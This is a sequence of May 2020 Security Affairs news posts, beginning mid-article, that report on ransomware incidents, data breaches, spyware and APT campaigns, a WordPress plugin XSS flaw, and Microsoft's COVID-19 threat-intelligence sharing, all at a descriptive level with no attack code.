Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts that studied these attacks stressed that, since the messages contained accurate details about real-life companies and events associated with the oil industry, the attackers took the time to research to craft maximally convincing content. 

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers depended on spear-phishing to get the credentials necessary for entering the businesses’ information technology (IT) network. It then used that access to wreak havoc on the enterprise’s operational technology infrastructure. 

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

129 million records of Russian car owners available on the dark web

A hacker is offering for sale on a dark web forum a database containing 129 million records of car owners in Moscow.

A hacker is attempting to sell on a dark web forum a database containing 129 million records of car owners in Moscow.

As a proof of the authenticity of the data, the hacker has leaked some anonymized data containing all the car details present in the traffic police registry.

The archive doesn’t include car owners’ details, exposed data includes the car’s make and model, place of registration, and the date of first and last registration.

The seller is offering the full version of the database for 0.3 BTC, which at the current rate is about $ 2677, paying 1.5 BTC ($ 13.386) it is possible to purchase information for “exclusive use.”

The accuracy of the data has been verified by Vedomosti media.

“Hackers posted a darknet database of Russian car owners, it includes 129 million positions from the traffic police registry. The authenticity of the information was confirmed by an employee of the car-sharing company, Vedomosti reports.” reads the website rbc.ru.

“In the published data there is only anonymized information. These include: place and date of registration of the car, make and model. According to hackers, the full version also contains the name, address, date of birth, passport numbers of car owners and their contact information.”

According to the Russian blog Nora the Hedgehog, several portals where people can pay fines for violating COVID-19 quarantine are leaking their full names and passport numbers by simply providing the registration number of the ticket.

The worst news is that the portals don’t implement any protection against brute-force attacks, allowing attackers to try all the possible combinations of unique ticket numbers to retrieve personal details of the people that paid the fines.

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)

The post 129 million records of Russian car owners available on the dark web appeared first on Security Affairs.

A bug in Edison Mail iOS app impacted over 6,400 users

A security bug in the iOS app has impacted over 6,400 Edison Mail users, the issue allowed some users to access other people’s email accounts.

An update released for iOS application of the Edison Mail introduced a security bug that resulted in some users being given access to other people’s email accounts.

“On Friday, May 15th, 2020, a software update enabled users to manage accounts across their Apple devices. This update caused a technical malfunction that impacted approximately 6,480 Edison Mail iOS users. The issue only impacted a fraction of our iOS app users (and no Android or Mac users were affected). This temporary issue was a bug, and not related to any external security issues.” reads a post published by the company.

“Data from these individual’s impacted email accounts may have been exposed to another user. No passwords were compromised. “

The Edison Mail app allows users to manage their Gmail, Yahoo, Outlook, iCloud, and other email services in a single place. The company offers apps for iOS, Android and macOS, and says its products are used by millions of individuals.

edison mail assistant-ios

The update was rolled out on May 15, it included a feature that allows users to manage their accounts across their Apple devices.

Shortly after the patch was released, some users started reporting they could access other people’s email accounts from the iOS app without authentication.

Edison quickly solved the issue, the company confirmed that the bug potentially impacted 6,480 iOS users.

Edison Mail also confirmed that user credentials were not exposed.

The company addressed the issue with two updates, the first one on Saturday that prevented impacted users from accessing any account from the Edison app, the second one on Sunday morning, which re-enabled access for impacted users.

“A new version of the application was made available early Sunday morning in the App Store that restores full functionality for these 6,480 users. Other users were not impacted and no action is required.” added the company.

“We have notified all individual users who may have been impacted by this issue via email, and as an additional safety precaution, suggested that impacted users also change their email account password. If you did not receive an email on this issue then your account was not impacted,”

Pierluigi Paganini

(SecurityAffairs – Edison Mail, hacking)

The post A bug in Edison Mail iOS app impacted over 6,400 users appeared first on Security Affairs.

Texas Department of Transportation (TxDOT) hit by a ransomware attack

A new ransomware attack hit the Texas government, the malware this time infected systems at the state’s Department of Transportation (TxDOT).

The Texas government suffered two ransomware attacks in a few weeks, the first one took place on May 8, 2020 and infected systems at the Texas court.

Now ransomware has infected malware the systems at the state’s Department of Transportation (TxDOT), that attack forced the administrators to shut down the systems to avoid the propagation of the ransomware.

The state’s Department of Transportation (TxDOT) discovered the second attack on May 14, the infection follows an unauthorized access to the Department’s network.

“The Texas Department of Transportation determined that on May 14, 2020, there was unauthorized access to the agency’s network in a ransomware event” states the TxDOT.

The agency immediately took steps to prevent further damages and isolated impacted systems, it “working to ensure critical operations continue during this interruption.”

The agency reported the incident to local authorities and is investigating into the incident with the help of the FBI.

At the time of writing it is not clear if the two attacks are connected, there are no technical details about both incidents either if the attackers have stolen any data.

In August 2019, Texas was hit by a wave of ransomware attacks that are targeting local governments.

At least 23 local government organizations were impacted by the ransomware attacks, the Department of Information Resources (DIR) is currently investigating them and providing supports to mitigate the attacks.

Pierluigi Paganini

(SecurityAffairs – TxDOT, hacking)

The post Texas Department of Transportation (TxDOT) hit by a ransomware attack appeared first on Security Affairs.

Mandrake, a high sophisticated Android spyware used in targeted attacks

Security experts discovered a highly sophisticated Android spyware platform, dubbed Mandrake, that remained undetected for four years.

Researchers from Bitdefender discovered a high-sophisticated Android spyware platform dubbed Mandrake, it was involved in highly targeted attacks against specific devices. Mandrake is an advanced cyberespionage platform, but experts believe the attacks are financially motivated.

Threat actors behind this campaign managed to fly under the radar for as long as possible. Attackers carefully selected the devices to infect and avoid compromise devices in countries that are of interest to them.

“Mandrake stood in the shadow for at least 4 years. During this time, it stole data from at least tens of thousands of users.” reads the report published by Bitdefender. “It takes special care not to infect everyone” – This is exactly what the actor did and most likely why it remained under the radar for 4 full years. Because of this strategy, the actual number of infections we were able to trace is quite low; Google Play Apps used as droppers to infect targets have only hundreds or – in some cases – thousands of downloads. It might even be possible that some of the infected users won’t face an attack at all if they present no interest to the actor.”

Most of the infections are in Australia, followed in Europe, America, and Canada. Experts observed two different waves of attacks, a first one in 2016 and 2017.

Experts detected seven malicious applications delivering Mandrake in Google Play alone, namely Abfix, CoinCast, SnapTune Vid, Currency XE Converter, Office Scanner, Horoskope, and Car News.

Mandrake

Sinkholing performed by the experts revealed about 1,000 victims during a 3-week period. The researchers estimated that the tens of thousands, and probably hundreds of thousands, were infected in the last 4 years.

During the past four years, the platform has received numerous updates, operators constantly implemented new features.

Mandrake allows attackers to gain complete control over an infected device and exfiltrate sensitive data, it also implements a kill-switch feature (a special command called seppuku (Japanese form of ritual suicide)) that wipes all victims’ data and leave no trace of malware.

“The attacker has access to data such as device preferences, address book and messages, screen recording, device usage and inactivity times, and can
obviously paint a pretty accurate picture of the victim, and their whereabouts.” continues the report. “The malware has complete control of the device: it can turn down the volume of the phone and block calls or messages, steal credentials, exfiltrate information, to money transfers and blackmailing. It can conduct phishing attacks, by loading a webpage and injecting a specially crafted JavaScript code to retrieve all data from input forms.”

The list of targets is long and includes an Australian investment trading app, crypto-wallet apps, the Amazon shopping application, Gmail, banking software, payment apps, and an Australian pension fund app.

The malware avoids the detection delaying the activities and working in three stages: dropper, loader, and core.

The dropper is represented by the apps published in Google Play, while it is not possible to determine when the loader and the core are delivered.

The malware implements evasion techniques such as anti-emulation and leverages administrator privileges and the Accessibility Service to achieve persistence.

The report contains technical details about the threat, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Mandrake, hacking)

The post Mandrake, a high sophisticated Android spyware used in targeted attacks appeared first on Security Affairs.

FBI warns US organizations of ProLock ransomware decryptor not working

The FBI‌ issued a flash alert to warn organizations in the United States that the ProLock ransomware decryptor doesn’t work properly.

Early this month, the FBI‌ issued a flash alert to warn organizations of the new threat actor targeting healthcare, government, financial, and retail industries in the US.

“The decryption key or ‘decryptor’ provided by the attackers upon paying the ransom has not routinely executed correctly,” states the alert.

“The decryptor can potentially corrupt files that are larger than 64MB and may result in file integrity loss of approximately 1 byte per 1KB over 100MB.”

Threat actors are attempting to take advantage of the ongoing Coronavirus pandemic and are using COVID-19 lures in their attacks.

Experts reported several ransomware attacks against businesses and organizations, the ProLock ransomware is just is yet another threat to the list.

The FBI is recommending victims of ransomware attacks to avoid paying the ransom to decrypt their files. Feds warned that the decryptor for the ProLock is not correctly working and using it could definitively destroy the data. The descriptor could corrupt files larger than 64MB during the decryption process.

The PwndLocker ransomware first appeared in the threat landscape by security researchers in late 2019, operators’ demands have ranged from $175,000 to more than $660,000 worth of Bitcoin.

According to the FBI, operators behind the threat gain access to hacked networks via the Qakbot (Qbot) trojan, but experts from Group-IB added that they also target unprotected Remote Desktop Protocol (RDP)-servers with weak credentials. It is still unclear if the ProLock ransomware was managed by the Qakbot gang, or if the ProLock operators pay to gain access to hosts infected with Qakbot to deliver their malware.

“ProLock operators used two main vectors of initial access: QakBot (Qbot) and unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.” reads the report published by Group-IB.

“The latter is a fairly common technique among ransomware operators. This kind of access is usually bought from a third party but may be obtained by group members as well.”

In March, threat actors behind PwndLocker changed the name of their malware to ProLock, immediately after security firm Emsisoft released a free decryptor tool.

According to the popular investigator Brian Krebs, the systems at Diebold Nixdorf were recently infected by the ProLock ransomware (aka PwndLocker), the same piece of ransomware involved in the attack against Lasalle County, Ill. in March.

“Fabian Wosar, Emsisoft’s chief technology officer, said if Diebold’s claims about not paying their assailants are true, it’s probably for the best: That’s because current versions of ProLock’s decryptor tool will corrupt larger files such as database files.” reads the analysis published by Krebs.

“As luck would have it, Emsisoft does offer a tool that fixes the decryptor so that it properly recovers files held hostage by ProLock, but it only works for victims who have already paid a ransom to the crooks behind ProLock.

“We do have a tool that fixes a bug in the decryptor, but it doesn’t work unless you have the decryption keys from the ransomware authors,” Wosar said.”

Pierluigi Paganini

(SecurityAffairs – ProLock, hacking)

The post FBI warns US organizations of ProLock ransomware decryptor not working appeared first on Security Affairs.

Stored XSS in WP Product Review Lite plugin allows for automated takeovers

A critical flaw in the WP Product Review Lite plugin installed on over 40,000 WordPress sites could potentially allow their take over.

Attackers could exploit a critical vulnerability in the WP Product Review Lite WordPress plugin to inject malicious code and potentially take over vulnerable websites.

The WP Product Review Lite plugin allows site owners to quickly create custom review articles using pre-defined templates, it is currently installed on over 40,000 WordPress sites.

The vulnerability was discovered by researchers at Sucuri Labs, it is a persistent XSS that could be exploited by remote, unauthenticated attackers.

“During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.” reads the analysis published by Sucuri.

“All user input data is sanitized but the WordPress function used can be bypassed when the parameter is set inside an HTML attribute. A successful attack results in malicious scripts being injected in all the site’s products.”

Attackers can bypass the WordPress user input data sanitization function to exploit the Stored Cross-Site Scripting (Stored XSS) issue. Upon triggering the flaw, the attackers could inject malicious scripts in all the products stored in the database of the targeted website.

An attacker could trick a site admin into accessing the compromised products, then they could redirect them to a rogue site, or steal the session cookies to authenticate on behalf of the administrator.

Once the attacker has authenticated as an admin, it could add a new admin account to take over the site.

Researchers at the Sucuri Labs revealed that they are not aware of any attacks in the wild exploiting the flaw.

Experts recommend site administrators to update their plugin to version 3.7.6 as soon as possible because unauthenticated attacks could be automated by attackers.

“Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites,” Sucuri Labs conclude.

“The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.”

The vulnerability was reported to the plugin developers on May 13, and it was fixed in only 24 hours, on May 14, 2020.

At the time of writing, more than 7,000 users have already fixed their WP Product Review Lite plugin, this means that more than 32,000 sites have yet to do it.

Pierluigi Paganini

(SecurityAffairs – WP Product Review Lite, hacking)

The post Stored XSS in WP Product Review Lite plugin allows for automated takeovers appeared first on Security Affairs.

Coronavirus-themed attacks May 10 – May 16, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 10 to May 16, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 12 – Zeus Sphinx continues to be used in COVID-19-themed attacks

The Zeus Sphinx banking Trojan continues to evolve while receiving new updates it is employed in ongoing coronavirus-themed scams. 

May 13 – Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

May 14 – China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

May 16 – Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

May 16 – QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in COVID-19-themed phishing campaign, crooks promise victims COVID-19 tax relief.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 10 – May 16, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 264

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Blue Mockingbird Monero-Mining campaign targets web apps
Shiny Hunters group is selling data from 11 companies on the Dark Web
Swiss rail vehicle manufacturer Stadler hit by a malware-based attack
ATM vendor Diebold Nixdorf suffered a Ransomware attack
Experts disclose security flaws in Oracles iPlanet Web Server
GDPR Data Security Checklist in the Age of COVID-19 and the Remote Workforce
Sodinokibi ransomware uses MS API to encrypt open and locked files
STAMINA, a new approach to malware detection by Microsoft, Intel
VMware is going to fix recent Salt issues in vROps
A cyber attack hit a port on Strait of Hormuz, Iran said
Adobe addresses critical issues in Acrobat, Reader, and DNG SDK
Patch now your vBulletin install before hacker will target your forum
Popular Page Builder WordPress plugin fixes critical issues. Update it now!
Trojan Lampion is back after 3 months
Zeus Sphinx continues to be used in Coronavirus-themed attacks
Chancellor Merkel has ‘hard evidence of Russian hackers targeted her
Crooks continues to use COVID-19 lures, Microsoft warns
Expert found 1,236 websites infected with Magecart e-skimmer
Healthcare giant Magellan Health discloses data breach after ransomware attack
Microsoft May 2020 Patch Tuesday fixes 111 flaws, 13 Critical
USCYBERCOM shares five new North Korea-linked malware samples
China-linked hackers are attempting to steal COVID-19 Vaccine Research
Crooks stole $10 million from Norways state investment fund Norfund
Google WordPress Site Kit plugin grants attacker Search Console Access
New Ramsay malware allows exfiltrating files from air-gapped computers
Zerodium will no longer acquire certain types of iOS exploits due to surplus
Chinese APT Tropic Trooper target air-gapped military Networks in Asia
Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed
Palo Alto Networks addresses tens of serious issues in PAN-OS
Russian APT Turlas COMpfun malware uses HTTP status codes to receive commands
Threat actors are offering for sale 550 million stolen user records
APT group targets high profile networks in Central Asia
Microsoft is open-sourcing COVID-19 threat intelligence
QNodeService Trojan spreads via fake COVID-19 tax relief

Pierluigi Paganini

(SecurityAffairs – newsletter, hacking)

The post Security Affairs newsletter Round 264 appeared first on Security Affairs.

Elexon, a middleman in the UK power grid network hit by cyber-attack

Elexon, a middleman in the UK power grid network, recently reported it was hit by a cyber attack.

Elexon, a middleman in the UK power grid network, was the victim of a cyber attack, the incident impacted only affected the internal IT network, including the company’s email server, and employee laptops

“Hackers have targeted a critical part of the UK’s power network, locking staff out of its systems and leaving them unable to send or receive emails.” reads a post published by The Telegraph.

“Elexon – a key player in the energy market between power station operators and firms that supply households and businesses – said in a statement that its internal systems and company laptops had been affected by the cyberattack. It declined to give further details.”

The company manages electricity supply and demand and distributes the power around the network according to the demand.

“We are advising you that today that ELEXON’s internal IT systems have been impacted by a cyber attack. BSC Central Systems and EMR are currently unaffected and working as normal. The attack is to our internal IT systems and ELEXON’s laptops only.” reads a post published by the company on its website. “We are currently working hard to resolve this. However please be aware that at the moment we are unable to send or receive any emails.”

The company has taken down the email server in response to the attack.

According to Elexon, the systems use to manage the UK’s electricity transit were not impacted.

The company published a second message to announce that it has discovered the root cause of the incident, and that is was working to restore the internal network and employee laptops. Elexon also added that the BSC Central Systems (and their data) and EMR were not impacted and are continuing to work as normal. 

Even if the company did not reveal any details on the attack, experts speculate the involvement of a ransomware.

Experts from security firm Bad Packets reported that Elexon had been running an outdated version of Pulse Secure VPN server, if confirmed threat actors could have exploited it to access the internal network.

In January, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned organizations that attackers continue to exploit the well known Pulse Secure VPN vulnerability tracked as CVE-2019-11510.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability, it could be easily exploited by using publicly available proof-of-concept code. The flaw can be used in combination with the CVE-2019-11539 remote command injection issue gain access to private VPN networks.

In October, the UK’s National Cyber Security Centre (NCSC) reported that advanced persistent threat (APT) groups have been exploiting recently disclosed VPN vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure, to breach into the target networks.

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379.

NSA also warned of multiple state-sponsored cyberespionage groups exploiting enterprise VPN Flaws

Despite Pulse Secure addressed the flaw in April, thousands of Pulse Secure VPN endpoints are yet to be fixed. In January 2020, Bad Packets reported that there were still 3,623 vulnerable Pulse Secure VPN servers, 1,233 of which were in the United States. The security firm confirmed, Elexon was still running an outdated Pulse Secure VPN installation.

The UK’s National Grid agency publicly announced that the incident did not affect electricity supply across the nation.

Pierluigi Paganini

(SecurityAffairs – Elexon, hacking)

The post Elexon, a middleman in the UK power grid network hit by cyber-attack appeared first on Security Affairs.

APT group targets high profile networks in Central Asia

Security firms have foiled an advanced cyber espionage campaign carried out by Chinese APT and aimed at infiltrating a governmental institution and two companies.

Antivirus firms have uncovered and foiled an advanced cyber espionage campaign aimed at a governmental institution and two companies in the telecommunications and gas sector.

The level of sophistication of the attack and the nature of targets suggests the involvement of an advanced persisten threat, likely from China, focused on cyber espionage activity in Central Asia.

Attackers used multiple commodity malware and previously unknown backdoors in the attacks, the analysis of their code suggests a possible link with multiple campaigns uncovered over several years.

Most of the C2 used by the attackers are hosted by the provider Choopa, LLC, and threat actors made large use of Gh0st RAT, a malware attributed to China-linked cyber espionage groups.

The security firm ESET and Avast first detected the attacks since September and January respectively. The researchers identified a host used as a repository containing hacking tools and backdoors, whose code has many similarities with malware previously associated with China-linked APT groups.

“The samples we analyzed contain links to malware samples and campaigns, such as MicrocinBYEBY, and Vicious Panda, previously described by Kaspersky, Palo Alto Networks, and Check Point, respectively. The backdoors we found are custom tools that have not previously been analyzed, as far as we know.” reads a report published by Avast. “The majority of the C&C servers are registered to Choopa, LLC, a hosting platform that has been used by cybercriminals in the past.”

Below a timeline of the attacks that appeared to be associated with the same threat actor.

Avast APT Timeline_May-2020

“An APT group, which we believe could possibly be from China, planted backdoors to gain long-term access to corporate networks. Based on our analysis, we suspect the group was also behind attacks active in Mongolia, Russia, and Belarus.” continues Avast.

Researchers from ESET that investigared into the attacks discovered three backdoors that collectively tracked as Mikroceen. The backdoors allowed the threat actors to manage the target file system, establish a remote shell, take screenshots, manage services and processes, and run console commands.

Below the list of backdoors published by ESET:

  • sqllauncher.dll (VMProtected backdoor)
  • logon.dll (VMProtected backdoor)
  • logsupport.dll (VMProtected backdoor)

Both “sqllauncher.dll” and “logon.dll” run as services and use the same C2 infrastructure, experts noticed that all of them feature protection against reverse engineering. Two of them, “sqllauncher.dll” and “logon.dll,” run as services and use the same C2 server.

Attackers use a version of the Mimikatz post-exploitation tool and rely on Windows Management Instrumentation (WMI) for lateral movement.

“Avast reported its findings to the local CERT team and reached out to the telecommunications company. We have not heard back from either organization.” concluded Avast.

“Avast has recently protected users in Central Asia from further attacks using the samples we analyzed.”

Both Avast and ESET have published a list of indicators of compromise (IoC) for the above threats.

Pierluigi Paganini

(SecurityAffairs – Microcin malware, hacking)

The post APT group targets high profile networks in Central Asia appeared first on Security Affairs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

While the number of Coronavirus-themed attacks continues to increase increased Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations to repeal these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. “

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.

COVID malspam

Microsoft is going to publicly release some of its threat indicators, the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made available the indicators both in the Azure Sentinel GitHub repo, and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the threat intelligence sharing of Coronavirus-related IOCs that will be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in Coronavirus-themed phishing campaign, crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use COVID-19 lure promising victims tax relief.

The phishing messages use Trojan sample associated with a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar,” experts from MalwareHunterTeam noticed that the malicious code was only detected by ESET AV.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The actual malware only targets Windows systems, but experts believe that developers are working to make it a cross-platform threat.

The Java downloader is obfuscated via Allatori in the bait document, the malware downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.” 

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated Javascript (Node.js) file used to acheve persistence by creating a “Run” registry key entry and for downloading another malicious payload.

One of the most interesting feature implemented by the QNodeService malware is the support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC. 

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payment.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information, the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Chinese APT Tropic Trooper target air-gapped military Networks in Asia

Chinese threat actors, tracked as Tropic Trooper and KeyBoy, has been targeting air-gapped military networks in Taiwan and the Philippines.

Chinese APT group Tropic Trooper, aka KeyBoy, has been targeting air-gapped military networks in Taiwan and the Philippines, Trend Micro researchers reported.

The Tropic Trooper APT that has been active at least since 2011, it was first spotted in 2015 by security experts at Trend Micro when it targeted government ministries and heavy industries in Taiwan and the military in the Philippines.

The threat actor targeted government offices, military, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong.

Since December 2014, the threat actors are using a malware dubbed USBferry in attacks against military/navy agencies, government institutions, military hospitals, and also a national bank.

“Recently, we discovered the Tropic Trooper group targeting Taiwanese and the Philippine military’s physically isolated environment using a USBferry attack (the name derived from a sample found in a related research).” reads the analysis published by Trend Micro. “USBferry has variants that perform different commands depending on specific targets; it can also combine capabilities, improve its stealth in infected environments, and steal critical information through USB storage”

Tropic Trooper

The USBferry USB malware could execute various commands on specific the infected system and allow to exfiltrate sensitive data through USB storage.

According to Trend Micro’s telemetry, attacks that employ USBferry attack are ongoing since December 2014 and has been targeting military or government users located in Asia.

The malware was first mentioned in a PwC report that attributes it to Tropic Trooper APT, but that did not include a detailed analysis.

The attackers would first target organizations related to military or government that implements fewer security measures compared with the real targets, then they attempt to use them as a proxy to the final target. In one case, the hackers compromised a military hospital and used it to move to the military’s physically isolated network.

Trend Micro researchers identified at least three versions of the malware with different variants and components.”

“Tropic Trooper uses the old way of achieving infection: by ferrying the installer into an air-gapped host machine via USB.” continues the report. “They employ the USB worm infection strategy using the USB device to carry the malware into the target’s computer and facilitate a breach into the secure network environment.”

The group used “tracert” and “ping” commands to map the target’s network
architecture (i.e. “tracert -h 8 8.8.8.8” collects the route (path) and measures transit delays of packets across an Internet Protocol (IP) network, while pings allow testing the target network’s connectivity).

The attackers attempted to determine if the infected machine has access to the internal network and the target mail portal.

In the absence of network connectivity, the malware collects information from the machine and copy the data to the USB drive.

The experts also discovered that the hackers use different backdoors in a recent attack, including WelCome To SvchostWelcome To IDShell, and Hey! Welcome Server.

The arsenal of the APT group includes scanning tools, a command-line remote control listener/port relay tool, and backdoor payload/steganography payload execution loaders.

“This targeted attack operation can be broken down into four important points.” concludes the report. “First, putting critical data in physically isolated networks is not an overarching solution for preventing cyberespionage activities. Second, their preferred technique of steganography isn’t just used to deliver payloads, but also for sending information back to the C&C server. Third, several hacking tools and components can be used to fulfill attacks in different target networks and environments. These tools and components also have a selfdelete command to make it tricky to trace the attack chain and all the related factors. Lastly, using an invisible web shell hides their C&C server location and makes detecting malicious traffic more difficult for network protection products

Pierluigi Paganini

(SecurityAffairs – Tropic Trooper, hacking)

The post Chinese APT Tropic Trooper target air-gapped military Networks in Asia appeared first on Security Affairs.

Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed

Britain’s Ministry of Defence contractor Interserve has been hacked, intruders have stolen up to 100,000 past and present employees’ details.

Interserve, a contractor for the Britain’s Ministry of Defence suffered a security breach, hackers have stolen up to 100,000 of past and current employees details. The company currently has around 53,000 employees. Stolen data includes payment information and details of their next of kin.

“Outsourcing group Interserve is recovering from a cyberattack which took place over the weekend that may have seen the details of up to 100,000 people stolen.” reported The Telegraph.

“Hackers broke into a human resources database owned by the outsourcing firm, which recently helped build the Birmingham Nightingale Hospital, on May 9 and stole information on current and former Interserve employees, a company insider said.”

Attackers might have accessed to names, addresses, bank details, payroll information, next of kin details, HR records, dates of absences, and pension information.

The security breach took place early May, at the time there are no details about the attack and it is unclear the number of affected individuals.

“Interserve was the target of a cyber security attack earlier this month.” reads a press release published by the company on its website.

“Interserve is working closely with the National Cyber Security Centre (NCSC) and Strategic Incident Response teams to investigate, contain and remedy the situation. This will take some time and some operational services may be affected. Interserve has informed the Information Commissioner (ICO) of the incident. We will provide further updates when appropriate.”

The defense contractor is investigating the incident with the help of the National Cyber Security Centre.

According to the defense contractor’s website, Interserve is present on 35 MoD sites, the company also announced that it is supporting the NHS during COVID-19.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed appeared first on Security Affairs.

Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands

Russia-linked cyberespionage group Turla targets diplomatic entities in Europe with a new piece of malware tracked as COMpfun.

